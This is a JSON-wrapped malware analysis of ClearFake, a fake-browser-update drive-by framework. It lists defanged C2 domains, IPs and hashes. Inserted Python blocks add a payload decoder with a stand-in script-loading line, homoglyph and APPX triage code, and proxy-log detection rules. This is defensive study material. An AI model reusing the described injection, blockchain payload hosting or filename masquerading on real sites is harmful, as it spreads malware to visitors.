{
	"id": "aab0bd3b-b154-4232-9274-7181e465bbae",
	"created_at": "2026-04-06T00:08:32.871775Z",
	"updated_at": "2026-04-10T03:33:16.487965Z",
	"deleted_at": null,
	"sha1_hash": "6057a7a4bcc8a5aec64087c5078152e485cc42f6",
	"title": "ClearFake: a newcomer to the “fake updates” threats landscape",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3355129,
	"plain_text": "ClearFake: a newcomer to the “fake updates” threats landscape\r\nBy Quentin Bourgue and Sekoia TDR\r\nPublished: 2023-10-16 · Archived: 2026-04-05 23:04:00 UTC\r\nClearFake is a new malicious JavaScript framework deployed on compromised websites to deliver further malware using the drive-by download technique. This blog post presents a technical analysis of the ClearFake installation flow, the malware delivered by ClearFake, its C2 infrastructure and the resulting tracking opportunities.\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 1 of 20\r\nTable of contents\r\nIntroduction\r\nClearFake installation flow\r\nInjected JavaScript code\r\nNext stage JavaScript payloads\r\nFake update web page\r\nMalware delivered by ClearFake\r\nSuspicious filename\r\nAPPX file\r\nOverview of HijackLoader\r\nClearFake C2 infrastructure and tracking opportunities\r\nClearFake C2 communications\r\nPivot on IP addresses\r\nConclusion\r\nClearFake IoCs \u0026 Technical Details\r\nIoCs\r\nClearFake C2 domains\r\nClearFake IP addresses\r\nClearFake infection chain\r\nMITRE ATT\u0026CK TTPs\r\nAnnexes\r\nAnnex 1 – Injected JavaScript codes\r\nAnnex 2 – Next stage payloads\r\nExternal references\r\nIntroduction\r\nOn 26 August 2023, cybersecurity researcher Randy McEoin published [1] an analysis of a new malicious JavaScript framework deployed on compromised websites to deliver further malware using the drive-by download technique. The newly discovered malware was named ClearFake because the JavaScript injected into compromised websites was in clear text: unlike most JavaScript malware, the early version was not obfuscated.\r\nClearFake is another “fake updates” threat that relies on social engineering to trick users into running a fake web browser update, as do SocGholish and FakeSG.
By linking the “fake updates” lure to the watering hole technique, ClearFake operators reach a wide range of users and conduct effective, scalable malware distribution campaigns.\r\nFrom our telemetry and customers’ feedback, we observed an increasing number of communications to ClearFake infrastructure at the end of September 2023. At the same time, we identified several hundred websites injected with ClearFake.\r\nSekoia.io’s Threat \u0026 Detection Research (TDR) team investigated this emerging threat and shares in this blog post its analysis of ClearFake, the malware delivered, and the tracking opportunities.\r\nClearFake installation flow\r\nHere is an overview of the infection chain stages observed distributing commodity malware via ClearFake:\r\nFigure 1. ClearFake installation flow, as of 30 September 2023\r\nInjected JavaScript code\r\nClearFake operators compromised WordPress sites, which act as watering holes, to inject malicious JavaScript code into the HTML pages.\r\nIn the early ClearFake version, the injected code was base64-encoded JavaScript embedded in a data URL. Once decoded, it downloaded another JavaScript payload from an attacker-owned domain (brewasigfi1978.workers[.]dev) and executed it with the eval() function.\r\nSince 28 September 2023, ClearFake has used a different technique to download the next stage: it queries a smart contract on the Binance Smart Chain.
The value returned by the smart contract call contains obfuscated JavaScript, base64-encoded and then converted to hexadecimal.\r\nAnnex 1 includes the obfuscated and deobfuscated injected JavaScript used before and after 28 September 2023, as well as an example of the smart contract response.\r\nNext stage JavaScript payloads\r\nThe first payload is obfuscated JavaScript that aims at downloading and executing the second payload; we deobfuscated it with deobfuscate.io. The obfuscated first payload is available in Annex 2.\r\nThe second payload is clear-text JavaScript that creates an iframe element to host the fake update interface and covers the entire document object model (DOM) of the web page by setting:\r\nthe iframe width and height to 100%;\r\nthe z-index, the attribute specifying the stack order of the element, to 99999999999.\r\nIt then loads the fake update interface into the iframe.\r\nThe third payload is an HTML page serving as the fake update interface; it downloads the fake update content for the appropriate web browser.
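The encoding layers of the smart-contract response described above, as an added Python decoder (our code, not from the original post or from Sekoia): the hex string returned by the contract call is hex-decoded to base64 text, which decodes to the JavaScript, from which next-stage URLs are then extracted. The sample contract result is constructed from a stand-in script and the next-stage.invalid URL is a placeholder; the optional unwrapping of a Solidity ABI string return value is an assumption about how such a contract might expose the blob, not something the post states.

```python
import base64
import re

# Constructed stand-in for a next-stage loader (not a real ClearFake script):
# the fake contract call 'returns' this, encoded the way the post describes.
SAMPLE_NEXT_STAGE = "var s=document.createElement('script');s.src='https://next-stage.invalid/vvmd54/';document.head.appendChild(s);"


def encode_like_clearfake(js):
    # base64 the script, then hex-encode the base64 text and prefix 0x,
    # i.e. the layering the post reports for the contract's return value.
    b64 = base64.b64encode(js.encode('utf-8'))
    return '0x' + b64.hex()


def abi_encode_string(payload):
    # Solidity ABI layout of a single dynamic 'string' return value (assumption:
    # the contract exposes the blob as a string): offset word, length word, data
    # padded to a 32-byte boundary. Used only to build the second test vector.
    head = (32).to_bytes(32, 'big') + len(payload).to_bytes(32, 'big')
    return '0x' + (head + payload + bytes(-len(payload) % 32)).hex()


def unwrap_abi_string(raw):
    # Detect the ABI 'string' layout above and return the bare data; anything
    # else (e.g. the raw hex of the base64 text) passes through unchanged.
    if len(raw) >= 64 and int.from_bytes(raw[:32], 'big') == 32:
        length = int.from_bytes(raw[32:64], 'big')
        if 64 + length <= len(raw):
            return raw[64:64 + length]
    return raw


def decode_contract_result(result_hex):
    # eth_call 'result' -> bytes -> (ABI unwrap) -> base64 text -> JavaScript source.
    # Raises ValueError (binascii.Error is a subclass) when a layer is malformed,
    # so callers can tell noise from a payload.
    h = result_hex[2:] if result_hex[:2].lower() == '0x' else result_hex
    raw = bytes.fromhex(h)
    b64 = unwrap_abi_string(raw).strip(bytes(1)).strip()
    return base64.b64decode(b64, validate=True).decode('utf-8')


def is_decodable(result_hex):
    try:
        decode_contract_result(result_hex)
        return True
    except ValueError:
        return False


URL_RX = re.compile(r'https?://[A-Za-z0-9.-]+(?:/[A-Za-z0-9._/-]*)?')


def extract_urls(js):
    # Pull next-stage URLs out of the decoded script for blocking and hunting.
    return URL_RX.findall(js)


SAMPLE_RESULT = encode_like_clearfake(SAMPLE_NEXT_STAGE)
SAMPLE_RESULT_ABI = abi_encode_string(base64.b64encode(SAMPLE_NEXT_STAGE.encode('utf-8')))

if __name__ == '__main__':
    for label, blob in (('raw hex', SAMPLE_RESULT), ('ABI string', SAMPLE_RESULT_ABI)):
        print(label, '->', extract_urls(decode_contract_result(blob)))
```

Feeding the decoder the real JSON-RPC result field (after confirming the contract address and method selector from the injected script in Annex 1) gives the next-stage script to hand to a deobfuscator; the URL list is what goes into blocklists.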
An example of the third payload is provided in Annex 2.\r\nThe HTML page downloads the final fake update page (HTML) from the URL path stored in the href attribute of an HTML element, modified using the decoded value of the JavaScript variable blank, e.g. “/lander/firefox_1695214415/_index.php”.\r\nThe source code of a fake update page is available on urlscan:\r\nhttps://urlscan.io/responses/a70b72efd8cd83f2b79cc9b9823112930e8ffa49edeb6bb5d2b1bbcabccefafb/\r\nFake update web page\r\nThe fake update page displays a realistic copy of the web browser download page for Chrome, Edge and Firefox, as shown in the following figure.\r\nFigure 2. ClearFake fake update pages for Chrome, Edge and Firefox web browsers\r\nIt also contains JavaScript code that fingerprints the victim’s web browser and initiates the download. The fake update page’s JavaScript does the following:\r\nImport the jQuery library used by the rest of the script;\r\nDefine the well-known FingerprintJS [2] module, which generates unique browser fingerprints from various attributes and features.
The module contains mathematical, fingerprint generation, utility and feature detection functions, as well as audio and font fingerprinting;\r\nSet the JavaScript onclick event handler of the download button;\r\nDefine functions for handling cookies and extracting values from the URL parameters;\r\nGenerate the visitor fingerprint and exfiltrate it to “hxxps://stats-best[.]site/fp.php”;\r\nGenerate the download URL from the “_lp”, “FPID”, “DownloadMouse”, “D” and “_token” parameters when the onclick event fires.\r\nMalware delivered by ClearFake\r\nOn 30 September 2023, Sekoia.io analysts ran the infection chain until they retrieved the final payload downloaded by the victim.\r\nSuspicious filename\r\nFor visitors using Microsoft Edge, ClearFake delivered a malicious Windows Application Packaging Project (APPX file) hosted on Dropbox.\r\nThe payload’s name, “MlсrоsоftЕdgеSеtup.appx”, masquerades as the legitimate Microsoft Edge installer and substitutes Cyrillic characters for the Latin letters “c”, “e”, “o” and “E”. Escaping the Unicode characters gives:\r\nMl\\u0441r\\u043Es\\u043Eft\\u0415dg\\u0435S\\u0435tup.appx\r\nLatin – Cyrillic – Unicode – Name\r\nc – с – \\u0441 – Cyrillic Small Letter Es\r\ne – е – \\u0435 – Cyrillic Small Letter Ie\r\no – о – \\u043E – Cyrillic Small Letter O\r\nE – Е – \\u0415 – Cyrillic Capital Letter Ie\r\nThe substitution is invisible to the user. Sekoia.io assesses with high confidence that the lookalike characters are used to evade static detection patterns based on the filename without raising the potential victim’s suspicion.\r\nIt is interesting to note that SocGholish operators successfully used this technique in 2022, as identified by Red Canary [3].
As this obfuscation method is not widely used, it is reasonable to ask whether the SocGholish operators are also behind the new ClearFake malware.\r\nAPPX file\r\nWindows App packages (APPX files) are ZIP archives storing the application’s executables together with metadata files: the manifest (AppxManifest.xml), the block map (AppxBlockMap.xml), the package signature (AppxSignature.p7x) and other optional files and directories.\r\nThe APPX file delivered by ClearFake (MD5: a7900cdbb2912d76aa6329c5c41d8609) is signed by “STECH CONSULTANCY LIMITED” and contains in particular the following executables:\r\n\\MlсrоsоftЕdgеSеtup\\AI_STUBS\\AiStubX64.exe (MD5: e89f448e8f41a590c51d34948bdc9c1e)\r\n\\MlсrоsоftЕdgеSеtup\\VFS\\AppData\\.exe (MD5: d113b3debc7e0a2da4369dd8d1dbad53)\r\nWhen the package is launched, Windows reads the application entry point from the APPX manifest, which points to AiStubX64.exe, and executes it. The AiStubX64.exe process copies the KSPSService executable from the Virtual File System (VFS) directory and launches it. This payload (KSPSService.exe) turned out to be a HijackLoader sample. More details on this execution flow can be found in the Microsoft documentation [4] and in FINSIN’s analysis [5].\r\nThe APPX file also contains a legitimate Microsoft Edge installer (MicrosoftEdgeUpdateSetup.exe, MD5: 58d8d75b0ca5e316862ed81cdb2d0c67) and a PowerShell script (chrome.ps1, MD5: bfe16fc5d100757bd9dec4ef1aa42913) that downloads a legitimate Edge installer from transfer[.]sh and executes it. Both run when the user launches the package. Sekoia.io analysts believe that installing the legitimate web browser alongside the malware further avoids raising the victim’s suspicion.\r\nAs noted by SentinelOne [6], APPX files are regularly used in malware campaigns to deploy payloads on infected hosts, including BazarBackdoor, Emotet and Magniber ransomware.
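The filename masquerading and the APPX package layout described in the two sections above, as one added triage example in Python (our code, not Sekoia’s): it rebuilds the lookalike name from the code points the post lists, flags it as mixed-script and maps the Cyrillic letters back to Latin, then opens a constructed in-memory APPX (manifest, stub launcher, VFS payload and signature blob are all placeholders) and reads the application entry point the way the launch sequence does. The confusables table is a hand-picked subset of Unicode TR39, and the package contents are stand-ins for the files the post names. Note that the escaped name the post gives also has a Latin lowercase l where the real installer has an i; that substitution is same-script and no script check catches it.

```python
import io
import unicodedata
import zipfile
import xml.etree.ElementTree as ET

# Code points from the escaped filename in the post; the name is rebuilt with
# chr() so the listing itself contains no non-ASCII characters.
CYR_ES, CYR_IE, CYR_O, CYR_CAP_IE = chr(0x0441), chr(0x0435), chr(0x043E), chr(0x0415)
LOOKALIKE_NAME = ('Ml' + CYR_ES + 'r' + CYR_O + 's' + CYR_O + 'ft' + CYR_CAP_IE
                  + 'dg' + CYR_IE + 'S' + CYR_IE + 'tup.appx')

# Hand-picked subset of Unicode TR39 confusables (Cyrillic -> Latin). The lowercase
# Latin 'l' standing in for 'i' in the name above is same-script and not caught here.
CONFUSABLES = {
    CYR_ES: 'c', CYR_IE: 'e', CYR_O: 'o', CYR_CAP_IE: 'E',
    chr(0x0430): 'a', chr(0x0440): 'p', chr(0x0445): 'x', chr(0x0443): 'y',
    chr(0x0410): 'A', chr(0x041E): 'O', chr(0x0420): 'P', chr(0x0421): 'C',
}


def script_of(ch):
    # unicodedata exposes no Script property; the first word of the character
    # name is enough to separate Latin from Cyrillic and Greek letters.
    first = unicodedata.name(ch, '').split(' ')[0]
    return first if first in ('LATIN', 'CYRILLIC', 'GREEK') else 'OTHER'


def analyse_filename(name):
    scripts = {script_of(c) for c in name if c.isalpha()} - {'OTHER'}
    return {
        'mixed_script': len(scripts) > 1,
        'skeleton': ''.join(CONFUSABLES.get(c, c) for c in name),
        'non_ascii': [(i, 'U+%04X' % ord(c)) for i, c in enumerate(name) if ord(c) > 127],
    }


NS = 'http://schemas.microsoft.com/appx/manifest/foundation/windows10'
BACKSLASH = chr(92)  # Windows path separator used inside the manifest


def build_sample_appx(entry_exe):
    # Constructed minimal package mirroring the layout the post describes:
    # manifest, stub launcher, VFS payload and a signature blob placeholder.
    pkg = ET.Element('Package', xmlns=NS)
    apps = ET.SubElement(pkg, 'Applications')
    ET.SubElement(apps, 'Application', Id='App', Executable=entry_exe,
                  EntryPoint='Windows.FullTrustApplication')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr('AppxManifest.xml', ET.tostring(pkg, encoding='unicode'))
        z.writestr('AI_STUBS/AiStubX64.exe', b'MZ stub placeholder')
        z.writestr('VFS/AppData/KSPSService.exe', b'MZ payload placeholder')
        z.writestr('AppxSignature.p7x', b'PKCX placeholder')
    return buf.getvalue()


def triage_appx(appx_bytes):
    with zipfile.ZipFile(io.BytesIO(appx_bytes)) as z:
        names = z.namelist()
        root = ET.fromstring(z.read('AppxManifest.xml'))
    apps = [el for el in root.iter() if el.tag.rsplit('}', 1)[-1] == 'Application']
    entry = [(a.get('Id'), a.get('Executable'), a.get('EntryPoint')) for a in apps]
    return {
        # presence only: signature validity needs signtool or Get-AuthenticodeSignature
        'has_signature_blob': 'AppxSignature.p7x' in names,
        'executables': sorted(n for n in names if n.lower().endswith('.exe')),
        'entry_points': entry,
        # full-trust (Desktop Bridge) entry points run as an ordinary Win32 process
        'full_trust': any(ep == 'Windows.FullTrustApplication' for _, _, ep in entry),
        'entry_present': all((exe or '').replace(BACKSLASH, '/') in names for _, exe, _ in entry),
    }


SAMPLE_APPX = build_sample_appx('AI_STUBS' + BACKSLASH + 'AiStubX64.exe')

if __name__ == '__main__':
    print(analyse_filename(LOOKALIKE_NAME))
    print(triage_appx(SAMPLE_APPX))
```

On a real sample, pass the downloaded file’s bytes to triage_appx and its name to analyse_filename; a full-trust entry point pointing at a stub next to a VFS payload, in a package whose name is mixed-script, is exactly the shape described above.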
Although this technique is not new, Sekoia.io believes its use improves the rate of successful compromise by reducing detection of the malicious payload’s execution.\r\nOverview of HijackLoader\r\nFirst observed in the wild in July 2023 by Zscaler ThreatLabz [7], HijackLoader is a modular loader that downloads and executes an obfuscated payload. It implements several evasion techniques, including code injection, use of syscalls, Windows API hashing and Heaven’s Gate. In recent months, HijackLoader delivered numerous commodity malware families, including Danabot, Lumma, Raccoon, RedLine, Remcos, SystemBC and Vidar.\r\nOnce executed, the HijackLoader sample deployed through the APPX file downloads its obfuscated payload from the adversary infrastructure “hxxps://server2-slabx.ocmtancmi2c5t[.]live/osmesis/1829973585.png”. The payload loaded by HijackLoader is a Raccoon sample communicating with its Command \u0026 Control (C2) server “128.140.101[.]125”.\r\nIn August 2023, Rapid7 observed [8] that the new IDAT Loader malware was delivered by ClearFake. Based on the code similarities between IDAT Loader and HijackLoader, and given the overlap in their C2 infrastructures, Sekoia.io assesses with high confidence that the same threat group operates both loaders.\r\nClearFake C2 infrastructure and tracking opportunities\r\nClearFake C2 communications\r\nClearFake stages use hardcoded URLs to download the next stage payloads from the C2 infrastructure. The URL patterns have not changed since the threat first appeared in July 2023.\r\nThe URLs observed on 30 September 2023 are:\r\nhxxps://ojhggnfbcy62[.]com/vvmd54/\r\nhxxps://ojhggnfbcy62[.]com/ZgbN19Mx\r\nhxxps://ojhggnfbcy62[.]com/lander/firefox_1695214415/_index.php\r\nThese URL patterns provide simple heuristics for identifying ClearFake C2 communications.
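The URL heuristics above turned into host-side detection over proxy logs, as an added example (our code, not the post’s): the path rules are derived from the observed URLs and the urlscan queries, the rule names are ours, the redirect rule uses the “_lp” and “_token” parameters that appear in the IoC table, and the log lines are constructed (the two example.com lines are negative controls that a plain substring match would flag).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Path rules derived from the URLs and urlscan queries in the post (rule names are
# ours). Anchors and [.] keep the regexes from matching unrelated paths.
CLEARFAKE_PATH_RULES = {
    'clearfake_stage2_js': re.compile(r'^/vvmd54/$'),
    'clearfake_stage3_html': re.compile(r'^/ZgbN19Mx$'),
    'clearfake_lander': re.compile(r'^/lander/(chrome|firefox|edge)[^/]*/_index[.]php$'),
    'clearfake_fp_exfil': re.compile(r'^/fp[.]php$'),
}

# Constructed proxy log lines (timestamp, client, method, URL, status); the two
# example.com lines are negative controls.
SAMPLE_PROXY_LOG = '''2023-09-30T10:01:02Z 10.0.0.12 GET https://ojhggnfbcy62.com/vvmd54/ 200
2023-09-30T10:01:03Z 10.0.0.12 GET https://ojhggnfbcy62.com/ZgbN19Mx 200
2023-09-30T10:01:04Z 10.0.0.12 GET https://ojhggnfbcy62.com/lander/firefox_1695214415/_index.php 200
2023-09-30T10:01:05Z 10.0.0.12 POST https://stats-best.site/fp.php 200
2023-09-30T10:01:09Z 10.0.0.12 GET http://ojhggnfbcy62.com/?_lp=1&_token=uuid_1ubo22l1dqqlm_1ubo22l1dqqlm6518291d817043.55797095 302
2023-09-30T10:02:00Z 10.0.0.30 GET https://www.example.com/lander/chrome-extension/index.php 200
2023-09-30T10:02:01Z 10.0.0.30 GET https://www.example.com/vvmd54/static.js 200
'''


def classify_url(url):
    # Return the names of every rule the URL satisfies (empty list = clean).
    p = urlsplit(url)
    hits = [name for name, rx in CLEARFAKE_PATH_RULES.items() if rx.search(p.path)]
    q = dict(parse_qsl(p.query))
    # Download redirect: '_lp' present and a '_token' of the uuid_ form seen in the IoCs.
    if '_lp' in q and q.get('_token', '').startswith('uuid_'):
        hits.append('clearfake_download_redirect')
    return hits


def scan_proxy_log(text):
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed line, skip rather than crash the scan
        src, url = fields[1], fields[3]
        for rule in classify_url(url):
            hits.append((src, urlsplit(url).hostname, rule))
    return hits


def score_clients(hits):
    # One stage alone is a lead; a client that touched two or more distinct
    # stages of the chain is a high-confidence ClearFake visit.
    stages = {}
    for src, _, rule in hits:
        stages.setdefault(src, set()).add(rule)
    return {src: ('high' if len(r) >= 2 else 'low') for src, r in stages.items()}


if __name__ == '__main__':
    found = scan_proxy_log(SAMPLE_PROXY_LOG)
    for hit in found:
        print(hit)
    print(score_clients(found))
```

The stage ordering in the hits (script, iframe host, lander, fingerprint exfiltration, then the download redirect) is the sequence a victim browser produces, so a client matching several rules within a short window is worth an immediate look at what it downloaded next.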
Sekoia.io used the following urlscan queries:\r\npage.url:\"/vvmd54/\"\r\npage.url:\"/ZgbN19Mx\"\r\npage.url.keyword:/.*\\/lander\\/(chrome|firefox|edge).*\\/_index\\.php/\r\nUsing urlscan and other URL scanning search engines, we retrieved the following domain names:\r\n921hapudyqwdvy[.]com\r\n98ygdjhdvuhj[.]com\r\nadqdqqewqewplzoqmzq[.]site\r\nbgobgogimrihehmxerreg[.]site\r\nboiibzqmk12j[.]com\r\nbookchrono8273[.]com\r\nborbrbmrtxtrbxrq[.]site\r\nbpjoieohzmhegwegmmuew[.]online\r\ncczqyvuy812jdy[.]com\r\newkekezmwzfevwvwvvmmmmmmwfwf[.]site\r\ngkrokbmrkmrxtmxrxr[.]space\r\nindogervo22tevra[.]com\r\nindogevro22tevra[.]com\r\nioiubby73b1n[.]com\r\nkjniuby621edoo[.]com\r\nkomomjinndqndqwf[.]store\r\nlminoeubybyvq[.]com\r\nnbvyrxry216vy[.]com\r\nngvcfrttgyu512vgv[.]net\r\nnmbvcxzasedrt[.]com\r\noekofkkfkoeefkefbnhgtrq[.]space\r\noiouhvtybh291[.]com\r\noiqwbuwbwqznjqsdfsfqhf[.]site\r\noiuugyfytvgb22h[.]com\r\noiuytyfvq621mb[.]org\r\nojhggnfbcy62[.]com\r\nomdowqind[.]site\r\nooinonqnbdqnjdnqwqkdn[.]space\r\nopkfijuifbuyynyny[.]com\r\nopmowmokmwczmwecmef[.]site\r\nowkdzodqzodqjefjnnejenefe[.]site\r\npklkknj89bygvczvi[.]com\r\npoqwjoemqzmemzgqegzqzf[.]online\r\npwwqkppwqkezqer[.]site\r\nreedx51mut[.]com\r\nsioaiuhsdguywqgyuhiqw[.]org\r\nsioaiuhsdguywqgyuhuiqw[.]org\r\nug62r67uiijo2[.]com\r\nvcrwtttywuuidqioppn1[.]com\r\nvvooowkdqddcqcqcdqggggl[.]site\r\nweomfewnfnu[.]site\r\nwffewiuofegwumzowefmgwezfzew[.]site\r\nwnimodmoiejn[.]site\r\nwsexdrcftgyy191[.]com\r\nytntf5hvtn2vgcxxq[.]com\r\nzasexdrc13ftvg[.]com\r\nziucsugcbfyfbyccbasy[.]com\r\nznqjdnqzdqzfqmfqmkfq[.]site\r\nPivot on IP addresses\r\nBy pivoting on the IP addresses the attacker-owned domains resolve to, we listed the following C2 servers, which we assess with high confidence to be exclusively associated with the ClearFake infrastructure.\r\n109.248.206[.]49\r\n109.248.206[.]83\r\n109.248.206[.]101\r\n109.248.206[.]118\r\n109.248.206[.]196\r\n135.181.211[.]230\r\nFive of them belong to the autonomous system (AS) “YACOLO-AS” (AS203493), located in Russia, and the last one belongs to the Hetzner AS (AS24940), favoured by numerous threat actors.\r\nFor all C2 servers, the common name (CN) of the TLS certificate exposed on port 443 is “921hapudyqwdvy.com”, which lets us enumerate the ClearFake infrastructure with scanning search engines such as Shodan or Censys. Sekoia.io used the following Shodan query to identify and proactively track the ClearFake C2 infrastructure:\r\nssl:\"921hapudyqwdvy.com\"\r\nClearFake operators run the Keitaro traffic distribution system (TDS) on the C2 servers to protect the infrastructure hosting the malicious content and to filter the incoming traffic for the targeted victims.\r\nTDR believes that ClearFake operators are likely to improve the stealth of the malware C2 communications in the near future.
They could also harden their C2 server configuration to prevent their infrastructure from being so easily illuminated.\r\nConclusion\r\nFirst seen in the wild in July 2023, ClearFake is another “fake updates” threat that quickly became widespread thanks to an effective lure targeting a wide audience and to the watering hole technique used to distribute the malware via numerous compromised websites.\r\nGiven its ongoing development and use of cutting-edge techniques, such as a blockchain to store malicious payloads, this threat must be closely monitored by organisations, as the malware delivered by ClearFake can be used to gain access to the victim’s network.\r\nThe tactics, techniques and procedures of the ClearFake operators overlap with those of SocGholish (tracked as TA569), in particular the use of watering holes, “fake updates” lures, the Keitaro TDS, the Dropbox file hosting service and filename masquerading with Cyrillic characters.
Considering this, Sekoia.io further assesses that ClearFake and SocGholish are possibly operated by the same threat group. Gathering additional evidence may help to confirm or refute this hypothesis.\r\nTo provide our customers with actionable intelligence, we will continue to monitor the evolution of ClearFake and of the other malware it delivers.\r\nClearFake IoCs \u0026 Technical Details\r\nIoCs\r\nThe list of IoCs is available on the Sekoia.io GitHub repository.\r\nClearFake C2 domains\r\n921hapudyqwdvy[.]com\r\n98ygdjhdvuhj[.]com\r\nadqdqqewqewplzoqmzq[.]site\r\nbgobgogimrihehmxerreg[.]site\r\nboiibzqmk12j[.]com\r\nbookchrono8273[.]com\r\nborbrbmrtxtrbxrq[.]site\r\nbpjoieohzmhegwegmmuew[.]online\r\nbrewasigfi1978[.]workers[.]dev\r\ncczqyvuy812jdy[.]com\r\newkekezmwzfevwvwvvmmmmmmwfwf[.]site\r\ngkrokbmrkmrxtmxrxr[.]space\r\nindogervo22tevra[.]com\r\nindogevro22tevra[.]com\r\nioiubby73b1n[.]com\r\nkjniuby621edoo[.]com\r\nkomomjinndqndqwf[.]store\r\nlminoeubybyvq[.]com\r\nnbvyrxry216vy[.]com\r\nngvcfrttgyu512vgv[.]net\r\nnmbvcxzasedrt[.]com\r\noekofkkfkoeefkefbnhgtrq[.]space\r\noiouhvtybh291[.]com\r\noiqwbuwbwqznjqsdfsfqhf[.]site\r\noiuugyfytvgb22h[.]com\r\noiuytyfvq621mb[.]org\r\nojhggnfbcy62[.]com\r\nomdowqind[.]site\r\nooinonqnbdqnjdnqwqkdn[.]space\r\nopkfijuifbuyynyny[.]com\r\nopmowmokmwczmwecmef[.]site\r\nowkdzodqzodqjefjnnejenefe[.]site\r\npklkknj89bygvczvi[.]com\r\npoqwjoemqzmemzgqegzqzf[.]online\r\npwwqkppwqkezqer[.]site\r\nreedx51mut[.]com\r\nsioaiuhsdguywqgyuhiqw[.]org\r\nsioaiuhsdguywqgyuhuiqw[.]org\r\nstats-best[.]site\r\nug62r67uiijo2[.]com\r\nvcrwtttywuuidqioppn1[.]com\r\nvvooowkdqddcqcqcdqggggl[.]site\r\nweomfewnfnu[.]site\r\nwffewiuofegwumzowefmgwezfzew[.]site\r\nwnimodmoiejn[.]site\r\nwsexdrcftgyy191[.]com\r\nytntf5hvtn2vgcxxq[.]com\r\nzasexdrc13ftvg[.]com\r\nziucsugcbfyfbyccbasy[.]com\r\nznqjdnqzdqzfqmfqmkfq[.]site\r\nClearFake IP addresses\r\n109.248.206[.]49\r\n109.248.206[.]83\r\n109.248.206[.]101\r\n109.248.206[.]118\r\n109.248.206[.]196\r\n135.181.211[.]230\r\nClearFake infection chain\r\nIoC – Description\r\nhxxps://hello-world-broken-dust-1f1c.brewasigfi1978.workers[.]dev/ – Download URL of the first JavaScript payload\r\nhxxps://ojhggnfbcy62[.]com/vvmd54/ – Download URL of the second JavaScript payload\r\nhxxps://ojhggnfbcy62[.]com/ZgbN19Mx – Download URL of the first HTML payload\r\nhxxps://ojhggnfbcy62[.]com/lander/firefox_1695214415/_index.php – Download URL of the second HTML payload (fake update page)\r\nhxxps://stats-best[.]site/fp.php – C2 URL for the fingerprinting data\r\nhxxp://ojhggnfbcy62[.]com/?_lp=1\u0026_token=uuid_1ubo22l1dqqlm_1ubo22l1dqqlm6518291d817043.55797095 – Redirect URL to the HijackLoader payload (APPX)\r\nhxxps://www.dropbox[.]com/e/scl/fi/6gtsp3qjf54lsec0piwvq/Ml-r-s-ft-dg-S-tup.appx?rlkey=hdm3apoi4n31v2rxruiosvtaa\u0026dl=1 – Download URL of the HijackLoader payload (APPX)\r\nb583d86c4abc6d6ca57bde802b7e9d8143a249aed6a560a4626e79ae13f6209d – HijackLoader payload (APPX), SHA-256\r\nd60d4da2cfe120138a3fde66694b40ae2710cfc2af33cb7810b3a0e9b1663a4f – HijackLoader payload (EXE), SHA-256\r\nhxxps://server2-slabx.ocmtancmi2c5t[.]live/osmesis/1829973585.png – URL hosting the HijackLoader payload\r\nocmtancmi2c5t[.]live – Domain hosting the HijackLoader payload\r\n128.140.101[.]125 – Raccoon C2 server\r\nMITRE ATT\u0026CK TTPs\r\nTactic – Technique\r\nResource Development – T1584 Compromise Infrastructure\r\nInitial Access – T1189 Drive-by Compromise\r\nExecution – T1059.007 Command and Scripting Interpreter: JavaScript\r\nDefense Evasion – T1027 Obfuscated Files or Information\r\nDefense Evasion – T1036 Masquerading\r\nDefense Evasion – T1140 Deobfuscate/Decode Files or Information\r\nCommand and Control – T1071.001 Application Layer Protocol: Web Protocols\r\nCommand and Control – T1105 Ingress Tool Transfer\r\nCommand and Control – T1132.001 Data Encoding: Standard Encoding\r\nExfiltration – T1041 Exfiltration Over C2 Channel\r\nAnnexes\r\nThe ClearFake scripts are available on the Sekoia.io GitHub repository.\r\nAnnex 1 – Injected JavaScript codes\r\nInjected JavaScript used before 28 September 2023:\r\nThe script decodes to:\r\nInjected JavaScript used since 28 September 2023:\r\nThe script decodes to:\r\nResponse of the Binance Smart Chain:\r\nAnnex 2 – Next stage payloads\r\nFirst next stage payload downloaded by the injected JavaScript from the Binance Smart Chain:\r\nThe script decodes to:\r\nThird next stage payload serving as a fake update interface and downloading the fake update content:\r\nExternal references\r\n1. [Randy McEoin’s blog] ClearFake Malware Analysis\r\n2. [NPM] @fingerprintjs/fingerprintjs\r\n3. [Red Canary] Threat – SocGholish\r\n4. [Microsoft Community Hub] Deploying local application data in a Desktop Bridge app with Advanced Installer\r\n5. [FINSIN] Infección en sitio web de e-commerce chileno (Infection on a Chilean e-commerce website)\r\n6. 
[SentinelOne] Inside Malicious Windows Apps for Malware Deployment\r\n7. [Zscaler] Technical Analysis of HijackLoader\r\n8. [Rapid7] Fake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers\r\nThank you for reading this blog post. We welcome any reaction, feedback or criticism about this analysis. Please contact us at tdr[at]sekoia.io.\r\nTags: CTI, Cybercrime, Malware\r\nSource: https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/"
	],
	"report_names": [
		"clearfake-a-newcomer-to-the-fake-updates-threats-landscape"
	],
	"threat_actors": [
		{
			"id": "ebc139d2-7450-46f5-a9e4-e7d561133fa5",
			"created_at": "2024-04-24T02:00:49.453475Z",
			"updated_at": "2026-04-10T02:00:05.321256Z",
			"deleted_at": null,
			"main_name": "Mustard Tempest",
			"aliases": [
				"Mustard Tempest",
				"DEV-0206",
				"TA569",
				"GOLD PRELUDE",
				"UNC1543"
			],
			"source_name": "MITRE:Mustard Tempest",
			"tools": [
				"SocGholish",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3bf456e4-84ee-48fd-b3ab-c10d54a48a34",
			"created_at": "2024-06-19T02:03:08.096988Z",
			"updated_at": "2026-04-10T02:00:03.82859Z",
			"deleted_at": null,
			"main_name": "GOLD PRELUDE",
			"aliases": [
				"Mustard Tempest ",
				"TA569 ",
				"UNC1543 "
			],
			"source_name": "Secureworks:GOLD PRELUDE",
			"tools": [
				"SocGholish"
			],
